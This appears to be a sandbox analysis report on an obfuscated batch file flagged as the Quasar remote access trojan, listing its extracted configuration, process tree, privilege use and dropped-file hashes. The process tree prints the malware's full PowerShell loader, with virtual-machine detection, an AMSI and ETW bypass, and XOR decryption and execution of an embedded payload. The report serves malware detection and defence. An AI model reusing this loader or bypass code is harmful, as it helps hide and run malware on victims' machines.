quasar | fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db

Analysis

max time kernel
48s
max time network
35s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01-12-2024 23:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.exe_obf.bat
Size

4.8MB
MD5

0ea9a510475daf6eb6499a876dade6c2
SHA1

6b2414fc97ff2aa43a561d3110ec3e5017ca87ec
SHA256

fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db
SHA512

b94b96765df14ee5ca7617f98b2e5750ad361193f435c7d9e0a6c9f7a775cfd70c7960c522a055d69125652ce070c2281e29ccd120b00d5748c5aa4587ea494a
SSDEEP

49152:6xA1np9ExTwHISa8/DNhtJJMJYz4xkFjyfgxLHRvs24CJMBDU78RH:k

Score

10^/10

quasar fr execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

127.0.0.1:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes

encryption_key
A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4268-96-0x00000235F53F0000-0x00000235F5714000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
4268	powershell.exe
1420	powershell.exe
4100	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
3092	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exe

pid	Process
1660	powershell.exe
1660	powershell.exe
4776	WMIC.exe
4776	WMIC.exe
4776	WMIC.exe
4776	WMIC.exe
1420	powershell.exe
1420	powershell.exe
3760	WMIC.exe
3760	WMIC.exe
3760	WMIC.exe
3760	WMIC.exe
4680	WMIC.exe
4680	WMIC.exe
4680	WMIC.exe
4680	WMIC.exe
4100	powershell.exe
4100	powershell.exe
420	WMIC.exe
420	WMIC.exe
420	WMIC.exe
420	WMIC.exe
4268	powershell.exe
4268	powershell.exe
4268	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	4776	WMIC.exe
Token: SeSecurityPrivilege	4776	WMIC.exe
Token: SeTakeOwnershipPrivilege	4776	WMIC.exe
Token: SeLoadDriverPrivilege	4776	WMIC.exe
Token: SeSystemProfilePrivilege	4776	WMIC.exe
Token: SeSystemtimePrivilege	4776	WMIC.exe
Token: SeProfSingleProcessPrivilege	4776	WMIC.exe
Token: SeIncBasePriorityPrivilege	4776	WMIC.exe
Token: SeCreatePagefilePrivilege	4776	WMIC.exe
Token: SeBackupPrivilege	4776	WMIC.exe
Token: SeRestorePrivilege	4776	WMIC.exe
Token: SeShutdownPrivilege	4776	WMIC.exe
Token: SeDebugPrivilege	4776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4776	WMIC.exe
Token: SeRemoteShutdownPrivilege	4776	WMIC.exe
Token: SeUndockPrivilege	4776	WMIC.exe
Token: SeManageVolumePrivilege	4776	WMIC.exe
Token: 33	4776	WMIC.exe
Token: 34	4776	WMIC.exe
Token: 35	4776	WMIC.exe
Token: 36	4776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4776	WMIC.exe
Token: SeSecurityPrivilege	4776	WMIC.exe
Token: SeTakeOwnershipPrivilege	4776	WMIC.exe
Token: SeLoadDriverPrivilege	4776	WMIC.exe
Token: SeSystemProfilePrivilege	4776	WMIC.exe
Token: SeSystemtimePrivilege	4776	WMIC.exe
Token: SeProfSingleProcessPrivilege	4776	WMIC.exe
Token: SeIncBasePriorityPrivilege	4776	WMIC.exe
Token: SeCreatePagefilePrivilege	4776	WMIC.exe
Token: SeBackupPrivilege	4776	WMIC.exe
Token: SeRestorePrivilege	4776	WMIC.exe
Token: SeShutdownPrivilege	4776	WMIC.exe
Token: SeDebugPrivilege	4776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4776	WMIC.exe
Token: SeRemoteShutdownPrivilege	4776	WMIC.exe
Token: SeUndockPrivilege	4776	WMIC.exe
Token: SeManageVolumePrivilege	4776	WMIC.exe
Token: 33	4776	WMIC.exe
Token: 34	4776	WMIC.exe
Token: 35	4776	WMIC.exe
Token: 36	4776	WMIC.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	3760	WMIC.exe
Token: SeSecurityPrivilege	3760	WMIC.exe
Token: SeTakeOwnershipPrivilege	3760	WMIC.exe
Token: SeLoadDriverPrivilege	3760	WMIC.exe
Token: SeSystemProfilePrivilege	3760	WMIC.exe
Token: SeSystemtimePrivilege	3760	WMIC.exe
Token: SeProfSingleProcessPrivilege	3760	WMIC.exe
Token: SeIncBasePriorityPrivilege	3760	WMIC.exe
Token: SeCreatePagefilePrivilege	3760	WMIC.exe
Token: SeBackupPrivilege	3760	WMIC.exe
Token: SeRestorePrivilege	3760	WMIC.exe
Token: SeShutdownPrivilege	3760	WMIC.exe
Token: SeDebugPrivilege	3760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3760	WMIC.exe
Token: SeRemoteShutdownPrivilege	3760	WMIC.exe
Token: SeUndockPrivilege	3760	WMIC.exe
Token: SeManageVolumePrivilege	3760	WMIC.exe
Token: 33	3760	WMIC.exe
Token: 34	3760	WMIC.exe
Token: 35	3760	WMIC.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exepowershell.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 4324 wrote to memory of 1660	4324	cmd.exe	81
PID 4324 wrote to memory of 1660	4324	cmd.exe	81
PID 1660 wrote to memory of 4776	1660	powershell.exe	82
PID 1660 wrote to memory of 4776	1660	powershell.exe	82
PID 4324 wrote to memory of 1420	4324	cmd.exe	84
PID 4324 wrote to memory of 1420	4324	cmd.exe	84
PID 4324 wrote to memory of 4148	4324	cmd.exe	85
PID 4324 wrote to memory of 4148	4324	cmd.exe	85
PID 4148 wrote to memory of 3760	4148	cmd.exe	86
PID 4148 wrote to memory of 3760	4148	cmd.exe	86
PID 4324 wrote to memory of 3712	4324	cmd.exe	89
PID 4324 wrote to memory of 3712	4324	cmd.exe	89
PID 3712 wrote to memory of 4680	3712	cmd.exe	90
PID 3712 wrote to memory of 4680	3712	cmd.exe	90
PID 4324 wrote to memory of 4100	4324	cmd.exe	92
PID 4324 wrote to memory of 4100	4324	cmd.exe	92
PID 4324 wrote to memory of 5056	4324	cmd.exe	93
PID 4324 wrote to memory of 5056	4324	cmd.exe	93
PID 5056 wrote to memory of 420	5056	cmd.exe	94
PID 5056 wrote to memory of 420	5056	cmd.exe	94
PID 4324 wrote to memory of 3984	4324	cmd.exe	95
PID 4324 wrote to memory of 3984	4324	cmd.exe	95
PID 4324 wrote to memory of 3092	4324	cmd.exe	96
PID 4324 wrote to memory of 3092	4324	cmd.exe	96
PID 4324 wrote to memory of 2364	4324	cmd.exe	97
PID 4324 wrote to memory of 2364	4324	cmd.exe	97
PID 4324 wrote to memory of 4444	4324	cmd.exe	98
PID 4324 wrote to memory of 4444	4324	cmd.exe	98
PID 4444 wrote to memory of 1776	4444	net.exe	99
PID 4444 wrote to memory of 1776	4444	net.exe	99
PID 4324 wrote to memory of 4268	4324	cmd.exe	100
PID 4324 wrote to memory of 4268	4324	cmd.exe	100
PID 4268 wrote to memory of 2136	4268	powershell.exe	102
PID 4268 wrote to memory of 2136	4268	powershell.exe	102
PID 2136 wrote to memory of 2000	2136	csc.exe	103
PID 2136 wrote to memory of 2000	2136	csc.exe	103
PID 4268 wrote to memory of 2104	4268	powershell.exe	104
PID 4268 wrote to memory of 2104	4268	powershell.exe	104
PID 2104 wrote to memory of 5028	2104	csc.exe	105
PID 2104 wrote to memory of 5028	2104	csc.exe	105
PID 4268 wrote to memory of 1208	4268	powershell.exe	106
PID 4268 wrote to memory of 1208	4268	powershell.exe	106
PID 1208 wrote to memory of 1784	1208	csc.exe	107
PID 1208 wrote to memory of 1784	1208	csc.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:420
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3984
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3092
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:2364
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, 0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));[ReFLeCtION.asSEmBlY]::LoAdWitHpArTIAlName(([SYsTEm.TEXT.eNcoDINg]::UTf8.geTstRINg((83, 121, 115, 116, 101, 109, 46, 67, 111, 114, 101)))).GetTYPE(([systEm.TeXT.EnCoDINg]::UtF8.GEtstRINg((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 69, 118)) + [SySTEm.tEXT.encodiNG]::UTF8.GETsTrIng((101, 110, 0x74, 0x69, 110, 0x67, 46, 69, 0x76, 101, 0x6e, 0x74, 0x50, 0x72, 111, 0x76, 105, 0x64, 0x65, 114)))).getfIeLd(([SYsTEm.text.eNCOdiNG]::uTF8.getstrINg((0x6d, 0x5f, 0x65, 0x6e)) + [sySTeM.Text.EncODiNg]::UtF8.GEtSTrInG((97, 98, 108)) + [syStem.TeXt.EncOdIng]::uTF8.GeTsTRing((0x65, 0x64))),([sySTem.Text.eNcodINg]::UtF8.GeTstRing([SYstEM.CoNveRT]::FROmBasE64STriNG('Tm9uUHVibGljLEluc3RhbmNl')))).seTValUE([REF].asseMBLy.GetTyPe(([sYStem.text.encOdINg]::UTf8.geTSTRiNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99)) + [SySTeM.texT.eNCoDING]::utF8.GeTStRINg((0x69, 110, 0x67, 46, 0x50, 83, 69, 0x74, 119, 76, 111, 103, 80, 0x72, 0x6f, 118, 0x69, 0x64, 0x65, 0x72)))).GEtfIeLD(([SYStEM.tExT.EncOdING]::uTf8.geTStRiNg((101, 0x74, 0x77, 80, 0x72, 111, 0x76, 105, 0x64, 0x65, 0x72))),([SystEm.teXT.EncOdinG]::Utf8.geTsTrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))).getVAluE($null),0);${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | .([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SYSTem.CoNVerT]::fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, 98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));${kdotcabiZvWzUe}=.([char](((489 -Band 330) + (489 -Bor 330) + 1171 - 1912))+[char](((5256 -Band 2125) + (5256 -Bor 2125) - 4663 - 2617))+[char]((436 - 1047 + 5610 - 4880))+[char](((6007 -Band 1143) + (6007 -Bor 1143) - 3369 - 3736))+[char](((6570 -Band 5861) + (6570 -Bor 5861) - 8832 - 3520))+[char](((-5856 -Band 5287) + (-5856 -Bor 5287) - 5737 + 6404))+[char]((190 - 4849 - 2788 + 7553))+[char]((15595 - 5946 - 3629 - 5919))+[char]((-4101 - 7031 + 6016 + 5215))+[char](((-7556 -Band 3381) + (-7556 -Bor 3381) + 9926 - 5635))) byte[] ${`Kd`Ottb`AIdX`WfeP}.lenGtH;for (${kdOtdGvp`BeC`Mnr}=0; ${kdOt`DGV`Pbe`Cmnr} -lt ${`KDottbAi`DXWfe`P}.lengTH; ${K`DotdG`VpbeCmnr}++) {${kDot`Ca`B`IZvWzue}[${`K`Dot`D`G`VPBeCmnr}]=${kdOttbaidxwfeP}[${kd`OtD`Gvpbe`Cmnr}] -bxor ${kdotDguKzLrZen}[${kd`OtdG`VpbeC`Mnr} % ${Kdotd`GuKzLr`Zen}.leNGTh]};.([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4vm2vckh\4vm2vckh.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9163.tmp" "c:\Users\Admin\AppData\Local\Temp\4vm2vckh\CSCDD63E09DA394AFAB7CE14354C25CF3.TMP"
      4⤵
      PID:2000
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cbdihrgd\cbdihrgd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91EF.tmp" "c:\Users\Admin\AppData\Local\Temp\cbdihrgd\CSCEBE103662CC34BC7B15A76A85452CB7E.TMP"
      4⤵
      PID:5028
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gj5ftyjs\gj5ftyjs.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95F6.tmp" "c:\Users\Admin\AppData\Local\Temp\gj5ftyjs\CSC59D5CF88278A49B5985CEBD849DCF78C.TMP"
      4⤵
      PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
e30544e6d048b2c1c6129c89835c16dd

SHA1
21d167ff64825d3f8a5c351c3160b670dc14cb60

SHA256
df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

SHA512
fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4vm2vckh\4vm2vckh.dll

Filesize
3KB

MD5
3018ef829b5c576361ab9bea800b7630

SHA1
40176c653351e21b575cd21f8a4a535b8b0502c1

SHA256
11fd575125670b88a175f87abcf8f40bef82b705be4b71b519dea368052bdf78

SHA512
83c5dbc970d048ec063f6c362647bc81b51e94d7832bf9ef134e50873fef428d790087df9b110f942f81cf0e496ce9ddd8ab41747c1b191aea3fd29007aba9c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9163.tmp

Filesize
1KB

MD5
86dc55f9702e6de90acb41ca5d1adf14

SHA1
4137c6d2ce92866c9ccd96b85b4d78ee9e4de166

SHA256
2a26d52df7c39dfc52e6baca7075845ab74dd5a6814f8a6e7553b51151fb0a7e

SHA512
64209f2cefea78c0e1e064cef960fdea74ab6954ad539623b1678b4fb04aedd5598457c3430002a172a1beaf3705592bb492b4c13e7d12a70565067e79f8150a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES91EF.tmp

Filesize
1KB

MD5
4e2ea1bedbcdc14b9d913018833dab3f

SHA1
17ffbf933fa01a39e415d96f61838806c9ca4e4e

SHA256
b382544ab3c4b9cdc44f4b487b6bb03322b7b72229c2007dfcc756149c6fda33

SHA512
e91efd6b43b3f6780d4c8955505aea25f8f2234e5bc4e4de24388f18862647c08ed330b4655044e5ca7349fe5677204a28ce100bb2fc724f64569a17cb972dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES95F6.tmp

Filesize
1KB

MD5
46851d010ff27f704a967fd48926066a

SHA1
68ad8426bce2a5952c2509fbc0f724d15f316317

SHA256
a5c01d2d91ccea51380d4fcfc74c50402a9c6b107c57983b55996c349afb8235

SHA512
f312743f94c5804ef172d6aa9683de8030ae3d0b81fc607931494d5c9760b4651a1ff1459b913cdf934be76260de9b90c10728943ab9bdf8282c8ffc9df114ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_inbr0se1.mz4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbdihrgd\cbdihrgd.dll

Filesize
7KB

MD5
c7ad6703cc5c3ac232cc82c5770c41d5

SHA1
236c281a0c03b5238a2db0ec43acce847daf4733

SHA256
0484d1e81aff2b1a6ed89c7cbff023893e89c32a79c402125c7f298d8472fc4a

SHA512
04d0736221dad8ae0127cde39a58e7be5a3e69e96100ca740ccadf861beb6f4a4a53729090b2a215ce6730c1c6f83308280202e68fda5bd25364a32036debc4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\gj5ftyjs\gj5ftyjs.dll

Filesize
4KB

MD5
375608621d7ad8f0db3e0811fe1fa360

SHA1
411dea8f90d9989ca79aede19046989e0243439b

SHA256
cb463ebee9124689a4f1a64a6af3222756e5da86362d5961c287090902c64aa5

SHA512
a9c570a135c6711245dce80bef08c05ccadaacce795f8ca3a22e662befe1e57396a4630e0e07d408f46d9c7c1a0cb56a908b58e94b3980c41e4612d502448caf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vm2vckh\4vm2vckh.0.cs

Filesize
296B

MD5
59e00d9a8925d2e96361aa508ec6f847

SHA1
787a9ed5d1e3b60b051580b95f48ddaddbb12df5

SHA256
3e745a1684973fcd0d62fb9f937cb7748df158ff608c8a5c3da39a8b1f30b540

SHA512
5d9e2cf08f0f56a9c1ce0d966e88fbb27b9fee06da16c38b723c5a5786fb35b725bb015cbaedb860e3fb68b7760b4afe072396803244466adc0707dcc991078f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vm2vckh\4vm2vckh.cmdline

Filesize
369B

MD5
31e9352158101debe2f119ab92306784

SHA1
4a3b9347cddf339c531e69242240add3e8ff70a2

SHA256
b1a8484625aca30b916fef4f93e511dc3f88b091df1ec18d0cdfbe49d1b553c6

SHA512
56505ee45da2b6f3ea5da8a4e0a2cefb7c87c9a8b7b30df71ae989d0db1eefce81b0e55c20baeeaedf8b146517f1e4451a76f65ecd862054aab5e7ccfa1327d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vm2vckh\CSCDD63E09DA394AFAB7CE14354C25CF3.TMP

Filesize
652B

MD5
870792e7f77c9d4c7182db1e33ae6cc2

SHA1
2b4eb0292bdb3e951b20bae2aee8bd3a9e0ce221

SHA256
f8d8e4402795348117c5f88b84b1bfd4954c5db48a465b9bcec41ba1f33d0008

SHA512
eda8f23667becb76b9187c424a83cf29905202b35a7888efbba404500f8496a6d5bdecef6c76d198e5b21d6d2a5487ea8434c83647e1deac00a1ae7eb139d05e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cbdihrgd\CSCEBE103662CC34BC7B15A76A85452CB7E.TMP

Filesize
652B

MD5
f9dbffa60ce3835d21adf6a654f0c180

SHA1
b1f271a017edada3e689b2bb7918b9c091c9b933

SHA256
63e23105b55d8d40fc7d15950bf2f687a80079b53f77bb967f75858f7a3d059c

SHA512
f7a3b503fd6cef9cba223d7ab20ab8033d3b8ef9545efe0b8257cb2b72875133f4a95a49352f6900503a2a85faa7dbc18b12d61a44d9c66f3fd0345ec6790765

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cbdihrgd\cbdihrgd.0.cs

Filesize
9KB

MD5
5fe5dff46b565d67601ae7d3420c5898

SHA1
bfbc553fcc84f1bc667f49f27207b26e2b47b3b4

SHA256
4e6e2f7132e6d41f4d8d8639eb9beb4e89fd683632f2e12f74f35fa82d682305

SHA512
f9b0ecad474ec77d88e1f27196e3e0a6f65d38999b50f5c6ba34fc41dcddcffb46ca93fcf9e32aa556352c091fabd0b2722819980b8ab22df2349ee9a8f9c7f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cbdihrgd\cbdihrgd.cmdline

Filesize
369B

MD5
30d1ab9aee2a17bc2d52e02141167be6

SHA1
32687a2d6bc3874d5ae7b39e3853c3b1a4da33ec

SHA256
829982ac5b36a8e7d5dd946ab226a81935b055495f3ad902ea0e659b629755e0

SHA512
a8e314d7c7793c038342fa26daa530668ea69b033761daa06ac92f3ee6f1f16b4ff259575226a77b36b6692dc8f126d01eb9e9937bb4bc1af3ca98a2c0b119ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gj5ftyjs\CSC59D5CF88278A49B5985CEBD849DCF78C.TMP

Filesize
652B

MD5
300e42e5e397b1c360940cede1841c70

SHA1
ec492b77c0464043b0fb6740e65a50e221f5ddf1

SHA256
